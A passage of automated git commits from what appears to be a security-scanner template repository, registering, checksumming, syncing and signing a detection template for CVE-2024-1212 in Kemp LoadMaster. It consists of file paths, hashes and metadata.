https://kemptechnologies.com/ - https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212 - https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212 + - https://nvd.nist.gov/vuln/detail/CVE-2024-1212 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 From 82925b02f81dfdf6832cd051937d49cae1aec923 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 04:11:42 +0000 Subject: [PATCH 20/86] Auto Generated New Template Addition List [Wed Mar 20 04:11:42 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4627f5e9d0..932ae622c6 100644 --- a/.new-additions +++ b/.new-additions @@ -27,6 +27,7 @@ file/keys/wireguard/wireguard-private.yaml http/cves/2023/CVE-2023-49785.yaml http/cves/2023/CVE-2023-5830.yaml http/cves/2023/CVE-2023-5914.yaml +http/cves/2024/CVE-2024-1212.yaml http/cves/2024/CVE-2024-1698.yaml http/exposed-panels/bynder-panel.yaml http/exposed-panels/cisco/cisco-expressway-panel.yaml From a35069ee22b0a20ebee646d2be759e8211c7ec44 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 04:11:56 +0000 Subject: [PATCH 21/86] Auto Generated Templates Checksum [Wed Mar 20 04:11:56 UTC 2024] :robot: --- templates-checksum.txt | 75 +++++++++++++++++++++--------------------- 1 file changed, 38 insertions(+), 37 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7516f9bdb0..649fc4f262 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -10,7 +10,7 @@ TOP-10.md:06a54531fef2bfc5ec2fa38485a3e30c247a3132 cloud/enum/aws-app-enum.yaml:26d0dcf57c7ba8003940ed1d53a62971564b2018 cloud/enum/aws-s3-bucket-enum.yaml:0d101b898bbaebceea4020963d11829f8167029f cloud/enum/azure-db-enum.yaml:3d29a3c86288356d862922ef0527de99187bf734 -cloud/enum/azure-vm-cloud-enum.yaml:69ca5c626f0061e4c9bcc922bf9e05f078459bd2 +cloud/enum/azure-vm-cloud-enum.yaml:6d9043c907009b2ff6afc6cd09bd35a6d27f6fe9 cloud/enum/azure-website-enum.yaml:037397591c799d32eb8abc94a346ff0805d68204 cloud/enum/gcp-app-engine-enum.yaml:b22ff0601a3f7f6ddc39e39ab9dc34410d213e41 cloud/enum/gcp-bucket-enum.yaml:896300c26517adf67feb80304f5edb25590a03c4 @@ -1199,7 +1199,7 @@ http/cves/2017/CVE-2017-16894.yaml:0c7f7d0bdb16cdff6e7a380ba56208eb1ca9d6e6 http/cves/2017/CVE-2017-17043.yaml:b45105c0de0d90d61a79191de73976e9cd4fb790 http/cves/2017/CVE-2017-17059.yaml:d40f8c2b908798457c9b02fa98a480b8bc0a7215 http/cves/2017/CVE-2017-17451.yaml:04b0b3fec8b256c76cef8ea892836c2e420878b8 -http/cves/2017/CVE-2017-17562.yaml:f73fd69cc36d28c4be6a6747c45f942f857029ef +http/cves/2017/CVE-2017-17562.yaml:2e22c184cd57f7425fba3827242a122c39dc86e8 http/cves/2017/CVE-2017-17731.yaml:1666574cd4dfc7a3995867c7c4b621b267b885ff http/cves/2017/CVE-2017-17736.yaml:877434782e6a2c5b3095498877a022c3551b6ca8 http/cves/2017/CVE-2017-18024.yaml:6b154b9615599e11764e703081eca6329935ee5e @@ -1496,7 +1496,7 @@ http/cves/2019/CVE-2019-16932.yaml:182fef4932dc7931c45cd3d7aebdaeef9ded81e8 http/cves/2019/CVE-2019-16996.yaml:ad524a9c60b54d610e8c55acaa46e4958a9b8dce http/cves/2019/CVE-2019-16997.yaml:e103b4c103866170ecfaef2fcf0e2cf88609b940 http/cves/2019/CVE-2019-17270.yaml:8f282f5849f13dda11bbb8837079bb223d9687fb -http/cves/2019/CVE-2019-17382.yaml:2a14f06044507c830b2d10f4a86315439d64f88f +http/cves/2019/CVE-2019-17382.yaml:f76bdf75f84fdcae6c031cc28c3420d8dc40f808 http/cves/2019/CVE-2019-17418.yaml:dbeea758a5b8de4c18d2d8790798711113d69195 http/cves/2019/CVE-2019-17444.yaml:7b94376c34d962236141cba63543376257005654 http/cves/2019/CVE-2019-17503.yaml:6701aacab1ee79d24acd3cbd1497fb50399ad671 @@ -2398,7 +2398,7 @@ http/cves/2022/CVE-2022-1933.yaml:97c269db3367ffd56494243b090e307b4eb0b586 http/cves/2022/CVE-2022-1937.yaml:f888a42c920fb30ae5b563bf642af334cd97da95 http/cves/2022/CVE-2022-1946.yaml:982f4f9519b1a137a8d2f2c71c7f2225cb67da1d http/cves/2022/CVE-2022-1952.yaml:4c4d64ceb64295942d0d9c2c1ae79a9bc6a16ee7 -http/cves/2022/CVE-2022-2034.yaml:db07244959fe5aec265a0b9f1e8b398a93a6076c +http/cves/2022/CVE-2022-2034.yaml:6d1a2c994d2ebda1cdcdc84b36237565c66c592a http/cves/2022/CVE-2022-21371.yaml:e9b20049b90afecb519db58387e5922047ef5944 http/cves/2022/CVE-2022-21500.yaml:7a87435ea2a54ac9c454a344a87fd21e51758b36 http/cves/2022/CVE-2022-21587.yaml:9e40fc00a04665d81ac142e197d40f1926a521c6 @@ -2480,7 +2480,7 @@ http/cves/2022/CVE-2022-25489.yaml:5c5c7a7388f9e133b0cf380bad27eeaebb0c2a74 http/cves/2022/CVE-2022-25497.yaml:07424dc06af0ea2d10c5aa1a201ce4d0f2d26848 http/cves/2022/CVE-2022-2551.yaml:a2dc5d4686710a2e9aeea1bdadf8f7fac2f3766f http/cves/2022/CVE-2022-25568.yaml:aabffcf5827e7ee05211b2651ca350e913371665 -http/cves/2022/CVE-2022-2599.yaml:51779e43ad99b49a367ddd03a76fc22508c0c15c +http/cves/2022/CVE-2022-2599.yaml:f576fefcf8da91a4c868c4b06cad0a2ed36884cb http/cves/2022/CVE-2022-26134.yaml:788a7f51e1550cc5770aab979234ac35b54d2505 http/cves/2022/CVE-2022-26138.yaml:15d0534ab6765d2e536070eda15d020e04f43abc http/cves/2022/CVE-2022-26148.yaml:f37f9182974b9dd8d49af32a7ef9841fe7d704ae @@ -2819,7 +2819,7 @@ http/cves/2023/CVE-2023-24278.yaml:e397c7d647c7517b78e44dbc79c8fcbc80480623 http/cves/2023/CVE-2023-24322.yaml:c4b5cc0d4d70fa16682f706a954b95c84e0e7896 http/cves/2023/CVE-2023-24367.yaml:dab63258fffca6b44d754ede551d56eea925a477 http/cves/2023/CVE-2023-24488.yaml:8a381e70fd0643ed5d1371edb70b40e25e9b5ff8 -http/cves/2023/CVE-2023-24489.yaml:ffcbd0678ae55a267244d0a62703c1756b701aae +http/cves/2023/CVE-2023-24489.yaml:c895cc71b777b3ada793ebcddd00274157f7927d http/cves/2023/CVE-2023-24657.yaml:1efdbfecef2aacf600fb007989d4efc6aa9d7fbe http/cves/2023/CVE-2023-24733.yaml:f1b740ac9ba1fc859deb3c69798e1bc3d302ed4e http/cves/2023/CVE-2023-24735.yaml:e38322978b1598d32056adb11572c6c401107c40 @@ -3085,6 +3085,7 @@ http/cves/2024/CVE-2024-1071.yaml:672dd1ef0240ede4f06d3b98caf96f2f14bd1e8e http/cves/2024/CVE-2024-1208.yaml:6f0363cecc95a2187f9fbca30620a2d39d87eb15 http/cves/2024/CVE-2024-1209.yaml:36f848394da33f75c2198b8f5b9081f212b3ecd1 http/cves/2024/CVE-2024-1210.yaml:1333fe26c55e1b4e44bcfdc0e0de5226a053f949 +http/cves/2024/CVE-2024-1212.yaml:048e1190f404d00105e446714c22fd44431bd387 http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:7f5ad668e9c8e5ab56afee96df8907d7ccc71e0b http/cves/2024/CVE-2024-21644.yaml:e8d58594c2dc1021f9107eee925f11791e0627e7 @@ -3206,7 +3207,7 @@ http/default-logins/ofbiz/ofbiz-default-login.yaml:2e6eea7863853fca0a5546a479d43 http/default-logins/openemr/openemr-default-login.yaml:e47d165fc7a306238827e4ea1497307f932890cd http/default-logins/openmediavault/openmediavault-default-login.yaml:efb418987e7a7b80b6fc9ea78f883b4dcaa90efe http/default-logins/oracle/businessintelligence-default-login.yaml:29309871b052bb3f05de613e838dadb92dd47f79 -http/default-logins/oracle/peoplesoft-default-login.yaml:5da182e00f57e6927f30674cde5f7bae9de6bbd4 +http/default-logins/oracle/peoplesoft-default-login.yaml:21071ffc4b0449f88570d4d604038756ccd18209 http/default-logins/others/aruba-instant-default-login.yaml:398f77a4e4e01153465c51bdfeb3cf53f670a85b http/default-logins/others/ciphertrust-default-login.yaml:9d29315f7fd68f1e4f55dd046bf7c716658ef13e http/default-logins/others/cnzxsoft-default-login.yaml:71898b0928c2f380612addb0350fb686dd84e025 @@ -3292,7 +3293,7 @@ http/exposed-panels/acunetix-panel.yaml:b10cd9d4a29dea26e161ddeb85b6b920efd69870 http/exposed-panels/addonfinance-portal.yaml:38506f2dd6a3a69108a50fe67a2686af99398590 http/exposed-panels/adhoc-transfer-panel.yaml:dcce7565c43f4ea78e2a3ad9fc8216f301f05c94 http/exposed-panels/adiscon-loganalyzer.yaml:fc2432f93a3fd7724c3f0d2814d41c065e0b8b21 -http/exposed-panels/adminer-panel-detect.yaml:89f3dfcb1a75493cc7d806df52ee64b3e65450fa +http/exposed-panels/adminer-panel-detect.yaml:2c1c41366071aef22dcd3f0fb77608e8ba4d18d8 http/exposed-panels/adminer-panel.yaml:b266fbab664e4ee130429e725409cf78000739e0 http/exposed-panels/adminset-panel.yaml:2be3fbb1ec0fe028405fdb0353163d1352a14d65 http/exposed-panels/adobe/adobe-component-login.yaml:ca846d96566ad14a055b85c15bd2b61e3a786d8d @@ -4340,7 +4341,7 @@ http/exposures/apis/wadl-api.yaml:7a728eb7a4cb779218d582661a7fb2978abedc03 http/exposures/apis/wsdl-api.yaml:e28378d37cb724e50ad74e13158210a704a2d9df http/exposures/backups/exposed-mysql-initial.yaml:546b26c48697aa27b99c9d385c509b1af10e8907 http/exposures/backups/froxlor-database-backup.yaml:a8296d723d545dea6b9d898766db58cc8f06c984 -http/exposures/backups/php-backup-files.yaml:505b1da333d78f3266443cab2fa4f9a6e57d6635 +http/exposures/backups/php-backup-files.yaml:2c05d22cc231014da2a5964eee452bf96706b391 http/exposures/backups/settings-php-files.yaml:4deb7ac78c1f7df72c6efad11c7ce77373c3ba7b http/exposures/backups/sql-dump.yaml:e989e8b4ad56b0ed996c7dc9cec7eab2210c223c http/exposures/backups/zip-backup-files.yaml:0b4309555d6a4f0fee56b49d302d209baccb808e @@ -4822,19 +4823,19 @@ http/exposures/tokens/zendesk/zendesk-key.yaml:002e66de48b921b1485a90c9ee0b8202d http/exposures/tokens/zenserp/zenscrape-api-key.yaml:a8b850b2efaae638efc02b5d207fe6bc855610e9 http/exposures/tokens/zenserp/zenserp-api-key.yaml:dc1d18779abf2831c2b624b8cebad22f57bad735 http/exposures/tokens/zoho/zoho-webhook-token.yaml:213408cbf1610741f4f31da89e8dba8f3d5b20eb -http/fuzzing/cache-poisoning-fuzz.yaml:55b0174b93ae85bcd2a5bd8dae8d5f2ee6dc183c -http/fuzzing/header-command-injection.yaml:531a6bae6185a29c431f42e8f2d0e4931ec82d05 -http/fuzzing/iis-shortname.yaml:3b02c03dfa0000145db4e569e9894ae9f9bfe4e0 -http/fuzzing/linux-lfi-fuzzing.yaml:98fb1f938fadd7dbef664b4fb90f70340998090d -http/fuzzing/mdb-database-file.yaml:f10257c4e4200709619934b82ad68db7c8ddf918 -http/fuzzing/prestashop-module-fuzz.yaml:7dad3e5599c90ca0dd227bebde42d56d3dc4fe8d -http/fuzzing/ssrf-via-proxy.yaml:61406c0b18b887b8b0820c01ccb006f25a8febf2 -http/fuzzing/valid-gmail-check.yaml:a9ddd0375c3160a61a5f2387c1113b9b64df8879 -http/fuzzing/waf-fuzz.yaml:d748d662ef552cee252b45d68017a09286c6eb93 -http/fuzzing/wordpress-plugins-detect.yaml:6a6a62082132ee13694282e8b77818db20ae5e64 -http/fuzzing/wordpress-themes-detect.yaml:bac6070c72b0db61adc5945ec1b14326c766cd14 -http/fuzzing/wordpress-weak-credentials.yaml:31dff20ca524cae856476baac860a09fd9a536ed -http/fuzzing/xff-403-bypass.yaml:debf58b69daf4676a60aba8af99fd6dc99df1d7d +http/fuzzing/cache-poisoning-fuzz.yaml:f98fed523a1e8b80a6c5c12183c6f072bb81cf5e +http/fuzzing/header-command-injection.yaml:bf0af66d12ef68c553a7a0d496f469788f3d03c3 +http/fuzzing/iis-shortname.yaml:aafbc44fc50e604004bf52f14b83354e24163827 +http/fuzzing/linux-lfi-fuzzing.yaml:a92bbc9f1c966c3f909279c49e2dee0a2bfffac9 +http/fuzzing/mdb-database-file.yaml:f6bb4e9e482516e6a861cc1efc68063e61778d13 +http/fuzzing/prestashop-module-fuzz.yaml:8e7f0e0bd609549e38f8eadc603360e8a56f2a02 +http/fuzzing/ssrf-via-proxy.yaml:8b57f45fe9d33268b5ae1dcd1a73301a47dfee62 +http/fuzzing/valid-gmail-check.yaml:a91c4df030cbeb5d163df9a3150cb146eb495412 +http/fuzzing/waf-fuzz.yaml:0bf3b44516d1eab46bbc11fb2eada0293c76a2ad +http/fuzzing/wordpress-plugins-detect.yaml:4bd980e6a9b9246896b0961dbff25a199038bcf0 +http/fuzzing/wordpress-themes-detect.yaml:86b90c67fd9c7fb48a6eff67fdb63a185f402ea8 +http/fuzzing/wordpress-weak-credentials.yaml:13dbc34b62167f75f802b83a3e71d89387ba54a6 +http/fuzzing/xff-403-bypass.yaml:23f78013ddcc53b07fbc3a114f0eaa45f90001d5 http/honeypot/citrix-honeypot-detect.yaml:a632cb08a12e2d3dfe69f8b4e8d0cbd4d44cbbc5 http/honeypot/dionaea-http-honeypot-detect.yaml:7830d2af83e16b50c0a4b647defe89c9ac5efe25 http/honeypot/elasticpot-honeypot-detect.yaml:73cb47452335d2c4e95f07bdbaabcb7800b634aa @@ -4895,7 +4896,7 @@ http/miscellaneous/balada-injector-malware.yaml:46e26d3735f737c251df9a46d7091f3d http/miscellaneous/clientaccesspolicy.yaml:f1ce4622fb979da2754ffba7bf52cdfe3fc470d0 http/miscellaneous/crypto-mining-malware.yaml:10c82a94c2cf226eb22b8ac8e10dc88d8aa24387 http/miscellaneous/defaced-website-detect.yaml:045ede38b93611039e21dc0f249ddebf3a5499e5 -http/miscellaneous/defacement-detect.yaml:4bb02fec3ec11dcb407a956be1fc2f0a6bcc9897 +http/miscellaneous/defacement-detect.yaml:0636060c6c434c29a127d7cac1a29f86167d420e http/miscellaneous/detect-dns-over-https.yaml:46b316a9632c17d9cf75cbb27de9c706c9a14b0b http/miscellaneous/dir-listing.yaml:dad3bf5aa871745ab62bf6f4b61909bde637e326 http/miscellaneous/email-extractor.yaml:5815f093718b70c0b64c4c423cd1ec8ab94f1281 @@ -4912,7 +4913,7 @@ http/miscellaneous/maxforwards-headers-detect.yaml:9d69555c1fc58f644b5ccf2644e0a http/miscellaneous/microsoft-azure-error.yaml:bfa3c53d4023d524a09ba3565bd3bf63204ac58a http/miscellaneous/moodle-changelog.yaml:9dbf59caabecc08967456fa3986046e33f4dbf43 http/miscellaneous/netflix-conductor-version.yaml:31ad2c649ff4aa0703a5c7cd4e36d2245a8993e0 -http/miscellaneous/ntlm-directories.yaml:8d2b0ffc05206f993712a9bbd94071107bcda074 +http/miscellaneous/ntlm-directories.yaml:8d52b0df9375267f6ba7840037a48a96cb971dda http/miscellaneous/old-copyright.yaml:de816764aefeaf59f75201740f4f82fb31071194 http/miscellaneous/options-method.yaml:2e0edc5993baa53c6fb7e8307c80ea26254bc3e4 http/miscellaneous/rdap-whois.yaml:c25cfe8b61f82c032de77398cf1aed94f56f0004 @@ -4958,7 +4959,7 @@ http/misconfiguration/aem/aem-secrets.yaml:346f23f7070fdf59c2c76fddd12a5eb4f31c7 http/misconfiguration/aem/aem-security-users.yaml:ff974be49aaee03897db4a6d40117b9e5d02598d http/misconfiguration/aem/aem-setpreferences-xss.yaml:dd08fc188a7ad278c8ee3082b66d9d2282d1c9e8 http/misconfiguration/aem/aem-sling-userinfo.yaml:f38274749b0668275a6b8cdddc2707bbde9eb1a0 -http/misconfiguration/aem/aem-userinfo-servlet.yaml:47c5ab71db4a7fde4c72b30d1c273f2dc2e637b9 +http/misconfiguration/aem/aem-userinfo-servlet.yaml:4e42c3fd5d4ae21b1e0a686a35c69394d1d9d32b http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml:cc07ee10590df2dd7de1d03c73167bbd4d81b95b http/misconfiguration/aem/aem-xss-childlist-selector.yaml:a9ecdb229a17db9192821a583549813a1bb1fc3c http/misconfiguration/airflow/airflow-debug.yaml:c18746cecd6f440d9367f6ebe1ce70ff34e508af @@ -5073,7 +5074,7 @@ http/misconfiguration/gitlab/gitlab-public-repos.yaml:1a2b426983d0ca449461a9ece3 http/misconfiguration/gitlab/gitlab-public-signup.yaml:f604c8044baffdf63ed2215ccec5b5721202144b http/misconfiguration/gitlab/gitlab-public-snippets.yaml:64aa47f34d185b8bbbc04b242eb0a76886d641ec http/misconfiguration/gitlab/gitlab-uninitialized-password.yaml:d9959b940359896de41142fe765303a3627c7ae5 -http/misconfiguration/gitlab/gitlab-user-enum.yaml:899a8a3e6898f4898986bb1bda5e248b360bd427 +http/misconfiguration/gitlab/gitlab-user-enum.yaml:09ffd851b3108524029e04ca4f1a501e1c580757 http/misconfiguration/gitlist-disclosure.yaml:8111ac3c10bc09b42d9c2bc565cd5758cb6a220e http/misconfiguration/global-traffic-statistics.yaml:f5ab7750ae4d32d8b857b8290bcd98ac1358fa0d http/misconfiguration/glpi-directory-listing.yaml:29bb88890e78f83428d00799224679dfd993e1bc @@ -5320,9 +5321,9 @@ http/misconfiguration/proxy/metadata-hetzner.yaml:99b85a4199e83eff23ec416b6b6fff http/misconfiguration/proxy/metadata-openstack.yaml:6e1984d2e3aa87e07e6b7db80dbd7c9d10c9d417 http/misconfiguration/proxy/metadata-oracle.yaml:93d94888c382735e755c96a1908859778f1308ef http/misconfiguration/proxy/open-proxy-external.yaml:e05b7e6f0744ee250192e9167a89b4d6c7dfdee1 -http/misconfiguration/proxy/open-proxy-internal.yaml:5de892d38ee34977924d4eb2cbd644b4b51fe567 -http/misconfiguration/proxy/open-proxy-localhost.yaml:4cd4b2b6c999578dff79a1d9d0aab65b759db464 -http/misconfiguration/proxy/open-proxy-portscan.yaml:e4806af440f78fced0b1239e83f9a5b440c4b4ee +http/misconfiguration/proxy/open-proxy-internal.yaml:231fecdb37f031eb304aba2267a8ba6ad16641ec +http/misconfiguration/proxy/open-proxy-localhost.yaml:583e013ed1b8deaaa42735861dc5201a8285afc6 +http/misconfiguration/proxy/open-proxy-portscan.yaml:790b7ea770648cb312cb5c103951c3c7254cb0c2 http/misconfiguration/puppetdb-dashboard.yaml:5b1f354f5ab9343e46a20bd7c76a8ee044cf71b4 http/misconfiguration/put-method-enabled.yaml:4cbb1715aeb73cf6e638b02c9951ff02c7a67756 http/misconfiguration/python-metrics.yaml:0b1d1102e4329ebf75ae5cc259898f1cb1cd9670 @@ -6447,7 +6448,7 @@ http/technologies/google-frontend-httpserver.yaml:de094bfafe3b5aea16e1bffb3ab80c http/technologies/graphiql-detect.yaml:a50e33498f73c5c27694fdad64d7d5f06dc1fe29 http/technologies/graphql-detect.yaml:a0566e15058b3aeb2d4dae77cc99d23355938dac http/technologies/grav-cms-detect.yaml:f353a0fa76204ccd1c894aa850f977fef8c769f1 -http/technologies/graylog/graylog-api-exposure.yaml:c669347801d0d2a1ec1f100228f4f48e99f28dd9 +http/technologies/graylog/graylog-api-exposure.yaml:d101cae7fd923dd7f233bf27e3a9b3628b8c3d5e http/technologies/graylog-api-browser.yaml:5aaa8bff99b57cf700d0923b48778048789f2389 http/technologies/gunicorn-detect.yaml:4e32fda7d9483af8c21fd3ea7fa6669266e23d0d http/technologies/hanwang-detect.yaml:4866144f96b1fbc18567e10ad7732b8a1a8dfc5f @@ -7702,7 +7703,7 @@ http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml:63ec56f7d http/vulnerabilities/tongda/tongda-action-uploadfile.yaml:26127f055c9c3ffa79366002ca95ea0c80a9c1dc http/vulnerabilities/tongda/tongda-api-file-upload.yaml:868bdf72215e96c1c0b2f2a4e68ecefa98bf453c http/vulnerabilities/tongda/tongda-arbitrary-login.yaml:813a5228a57a292be77d48351f979e9b4ce4bdcc -http/vulnerabilities/tongda/tongda-auth-bypass.yaml:f661e567e8d9b51bdf29cc07155b552b92beab20 +http/vulnerabilities/tongda/tongda-auth-bypass.yaml:99626945f8fb206ae2046e9f22cebadaef9eef0e http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml:d1d9be064a074860683581a4e84f8e85a3abfc27 http/vulnerabilities/tongda/tongda-getdata-rce.yaml:b4452e0abc9faa89378a2d6b14c6ef99eddbb56d http/vulnerabilities/tongda/tongda-getway-rfi.yaml:02cae92f443ca026546155a79f51aab073d2a0dd @@ -7944,7 +7945,7 @@ http/vulnerabilities/wordpress/wp-vault-lfi.yaml:12ee639ae8dd7fb66560ac713aab3a4 http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml:d36b1dafca4c01fbc15d17c4e884144f36974304 http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml:9cd53ef3a743e970ff37c36b2c9640781d578878 http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml:0e1c6d447132c374e620d553de2cd8a8468f917e -http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml:9d1201fd282d799868a36ce2c49476f8c146711e +http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml:a9c485aef2957f73eec1ea22a2b851f98284f9c9 http/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml:f72f913987c22ad251d6b4b09e10fe57f20f0727 http/vulnerabilities/wordpress/wp-xmlrpc.yaml:b55a9ba158dc74c9797ce3cddb6464bf48106074 http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml:ec8dd93cf0c3f663465b7191136013def01f5d0f @@ -7985,13 +7986,13 @@ http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:daa2040c8238fbe51311e7ac http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380694a0 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b javascript/cves/2016/CVE-2016-8706.yaml:823829801f090b3c8aa0b65a21f506da440cb2a0 -javascript/cves/2023/CVE-2023-34039.yaml:15973462461926ddb4e6991f45579aa54ae7fc29 +javascript/cves/2023/CVE-2023-34039.yaml:d24071fd6387e212e60bd6503d2611015bea58cb javascript/cves/2023/CVE-2023-46604.yaml:5f4409197ba9dd7f86ae5de4beb6409ce7f1bfb8 javascript/cves/2024/CVE-2024-23897.yaml:2de4bb803c9ebd5e8a989cc1760102ea53ee95d3 javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad javascript/default-logins/redis-default-logins.yaml:f9a03987fac4e8150d9b8d5ab80779c6f41d8b7f -javascript/default-logins/ssh-default-logins.yaml:63a239d5a020912bf1e33b4ff59606e25181afe3 +javascript/default-logins/ssh-default-logins.yaml:7e0cd6f7e1cd9ff4473f9c0d9061f056234cbb62 javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94 javascript/detection/oracle-tns-listener.yaml:3d274f668de183b62c79c04782bf0740150b4423 javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04 @@ -8136,10 +8137,10 @@ network/misconfig/erlang-daemon.yaml:5360cef90f48dc3c6bdab6df6e44245f243f423c network/misconfig/ganglia-xml-grid-monitor.yaml:dac3b1babe27265e34d19b1bac7388d65f89281b network/misconfig/memcached-stats.yaml:18844aac24b0279e3bb974baccf32256d5482109 network/misconfig/mongodb-unauth.yaml:0a25bf55d5fedd1b56c397ae27e93483018ae16a -network/misconfig/mysql-native-password.yaml:a9f7b3791ec021bec37c88303be460decc98069f +network/misconfig/mysql-native-password.yaml:610a602de84dc589c5f48b133d27f6b77f3cc422 network/misconfig/printers-info-leak.yaml:3eaf0fc4e07c21308b3bd7f387f2f6765979ad15 network/misconfig/sap-router-info-leak.yaml:a7ebbd8a06f5add2a3ded6259da9b3b3b5e0f005 -network/misconfig/tidb-native-password.yaml:cee939c1ed6cf22fbd0fc3d2d6b4047ab02a5fa0 +network/misconfig/tidb-native-password.yaml:e59b6ae7f999845de1660e740e99c300175f2845 network/misconfig/tidb-unauth.yaml:5c00fa571b47b099a046afc2a7ff5aba4bfd20fd network/misconfig/unauth-psql.yaml:4234beb83e518739f430de109340c402c96a3740 network/vulnerabilities/clockwatch-enterprise-rce.yaml:3b34549e3d1b3ddcddab7a8cdfd7b9c57c8f2d37 @@ -8170,7 +8171,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:59b8ce63bd6dd7ced361b025574c2da600135edb +templates-checksum.txt:ea62e7a3ece798218348e5276776aff198c9f2f8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4e054164e70f24755f60d729079d9da2cb01b304 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 04:12:27 +0000 Subject: [PATCH 22/86] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 663e5a316a..da7f634231 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -32,6 +32,7 @@ on: - 'http/cves/2023/CVE-2023-49785.yaml' - 'http/cves/2023/CVE-2023-5830.yaml' - 'http/cves/2023/CVE-2023-5914.yaml' + - 'http/cves/2024/CVE-2024-1212.yaml' - 'http/cves/2024/CVE-2024-1698.yaml' - 'http/exposed-panels/bynder-panel.yaml' - 'http/exposed-panels/cisco/cisco-expressway-panel.yaml' From 6f0124d586899720b35a1f62666fca927398824e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 04:13:43 +0000 Subject: [PATCH 23/86] Auto Template Signing [Wed Mar 20 04:13:43 UTC 2024] :robot: --- http/cves/2024/CVE-2024-1212.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-1212.yaml b/http/cves/2024/CVE-2024-1212.yaml index f2464b4726..d27b2d6a70 100644 --- a/http/cves/2024/CVE-2024-1212.yaml +++ b/http/cves/2024/CVE-2024-1212.yaml @@ -44,3 +44,4 @@ http: - type: status status: - 200 +# digest: 4a0a004730450220557f3f2f5ab7b8e23925a9acc4979743940842b4936843aaae68876e24ed24a4022100f067f077e0dae8b1aa1264efb248349fdd7e6f95341ca06cbab9c183402f4e99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0da4a266ce7d494b6fb72b24aac4d472d3667dd2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 04:57:34 +0000 Subject: [PATCH 24/86] Auto Generated New Template Addition List [Wed Mar 20 04:57:34 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 932ae622c6..0b99585cdf 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +dns/soa-detect.yaml file/keys/dependency/dependency-track.yaml file/keys/docker/dockerhub-pat.yaml file/keys/doppler/doppler-audit.yaml From 10c586a607fb9fb78fefee84e5db124e07f66c30 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 04:57:39 +0000 Subject: [PATCH 25/86] Auto Generated Templates Checksum [Wed Mar 20 04:57:39 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 649fc4f262..3b84c9da72 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -122,6 +122,7 @@ dns/mx-service-detector.yaml:197d6c83e04011fc0ae267e999cad25e85a19d58 dns/nameserver-fingerprint.yaml:7a9247d4f45a9699418b4afed5cea0388b147735 dns/ptr-fingerprint.yaml:ecff55b058dba2ad98432eacea8b52ce1d8e7656 dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87 +dns/soa-detect.yaml:1d167b28182dd5423e0327242761e0ecfb886658 dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7 dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70 dns/worksites-detection.yaml:c54ce778fe66a138e794b87520392f285c8b6259 @@ -3085,7 +3086,7 @@ 